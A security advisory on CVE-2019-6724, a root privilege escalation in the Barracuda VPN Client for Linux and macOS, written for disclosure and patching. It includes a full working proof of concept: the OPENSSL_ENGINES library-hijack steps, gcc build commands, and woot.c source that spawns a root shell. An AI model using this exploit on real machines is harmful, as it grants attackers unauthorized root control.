ASA-2019-00157 – Barracuda: Privilege Escalation in VPN Client


Allele Security Alert

ASA-2019-00157

Identifier(s)

ASA-2019-00157, CVE-2019-6724

Title

Privilege Escalation in VPN Client

Vendor(s)

Barracuda

Product(s)

Barracuda VPN Client for macOS
Barracuda VPN Client for Linux

Affected version(s)

Barracuda VPN Client prior to version 5.0.2.7 for Linux
Barracuda VPN Client prior to version 5.0.2.7 for macOS

Fixed version(s)

Barracuda VPN Client version 5.0.2.7 for Linux
Barracuda VPN Client version 5.0.2.7 for macOS

Proof of concept

Yes

Description

The barracudavpn component of the Barracuda VPN Client prior to version 5.0.2.7 for Linux, macOS, and OpenBSD runs as a privileged process and can allow an unprivileged local attacker to load a malicious library, resulting in arbitrary code executing as root.

Technical details

The barracudavpn binary attempts to load a non-existent library named libcavium.so from /opt/phio/libs64/engines.

[root@localhost ~]# strace -u user1 -o /tmp/vpn.trace -ff -s 1000 /usr/local/bin/barracudavpn
[root@localhost ~]# grep \\.so /tmp/vpn.trace
open("/opt/phion/libs/engines/libcavium.so", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)

The path it tries to load a library can be influenced through OPENSSL_ENGINES environment variable.

[root@localhost ~]# export OPENSSL_ENGINES=/foobar
[root@localhost ~]# timeout 10s strace -u user1 -ff /usr/local/bin/barracudavpn 2>&1|grep '\.so'
open("/foobar/libcavium.so", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)

Then, achieving privilege escalation is straightforward.

[user1@localhost ~]$ mkdir foobar
[user1@localhost ~]$ gcc -fPIC -Wall -o woot.o -c woot.c
[user1@localhost ~]$ gcc -Wall -shared -Wl,-soname,libcavium.so -Wl,-init,woot -o foobar/libcavium.so woot.o
[user1@localhost ~]$ export OPENSSL_ENGINES=foobar

The content of woot.c:

#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

void woot(){
setreuid(0,0);
execl("/bin/sh","/bin/sh",NULL);
}

After building a malicious library and changing the environment variable, just running /usr/local/bin/barracudavpn will get privilege escalation.

[user1@localhost ~]$ id
uid=1000(user1) gid=1000(user1) groups=1000(user1) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[user1@localhost ~]$ /usr/local/bin/barracudavpn
sh-4.2# id
uid=0(root) gid=1000(user1) groups=1000(user1) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2#

Credits

Rich Mirch

Reference(s)

CVE-2019-6724 : Barracuda VPN Client Privilege Escalation on Linux and macOS
https://blog.mirch.io/2019/02/14/cve-2019-6724-barracuda-vpn-client-privilege-escalation-on-linux-and-macos/

Release Notes – Barracuda VPN Client for macOS
https://campus.barracuda.com/product/networkaccessclient/doc/78154147/release-notes-barracuda-vpn-client-for-macos/

Release Notes – Barracuda VPN Client for Linux
https://campus.barracuda.com/product/networkaccessclient/doc/78154149/release-notes-barracuda-vpn-client-for-linux/

CVE-2019-6724.sh
https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2019-6724.sh

CVE-2019-6724
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6724

CVE-2019-6724
https://nvd.nist.gov/vuln/detail/CVE-2019-6724

If there is any error in this alert or you wish a comprehensive analysis, let us know.

Last modified: March 27, 2019

We are not responsible for any data loss, device corruption or any other type of issue due to the use of any information mentioned in our security alerts.